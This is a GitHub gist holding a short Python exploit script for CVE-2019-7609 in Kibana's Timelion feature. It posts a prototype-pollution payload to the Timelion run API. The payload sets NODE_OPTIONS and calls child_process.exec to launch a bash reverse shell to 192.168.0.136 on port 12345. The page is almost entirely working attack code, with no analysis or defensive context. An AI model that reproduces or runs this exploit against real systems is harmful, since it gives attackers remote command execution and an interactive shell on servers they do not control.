Skip to content

Instantly share code, notes, and snippets.

@random-robbie

random-robbie/CVE-2019-7609.py

Created June 2, 2020 08:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save random-robbie/5a84debda14f8c4a56e96f3870889fe6 to your computer and use it in GitHub Desktop.
Save random-robbie/5a84debda14f8c4a56e96f3870889fe6 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2019-7609
Raw
CVE-2019-7609.py
import requests
session = requests.Session()
cmd = "bash -i >& /dev/tcp/192.168.0.136/12345 0>&1"
rawBody = "{\"sheet\":[\".es(*).props(label.__proto__.env.AAAA='require(\\\"child_process\\\").exec(\\\""+cmd+"\\\");process.exit()//')\\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')\"],\"time\":{\"from\":\"now-15m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Europe/London\"}}"
headers = {"Origin":""+KIB_URL+"","Accept":"application/json, text/plain, */*","kbn-version":"6.7.0","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":""+KIB_URL+"/_plugin/kibana/app/timelion","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/json;charset=utf-8"}
response = session.post(""+KIB_URL+"/_plugin/kibana/api/timelion/run", data=rawBody, headers=headers)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment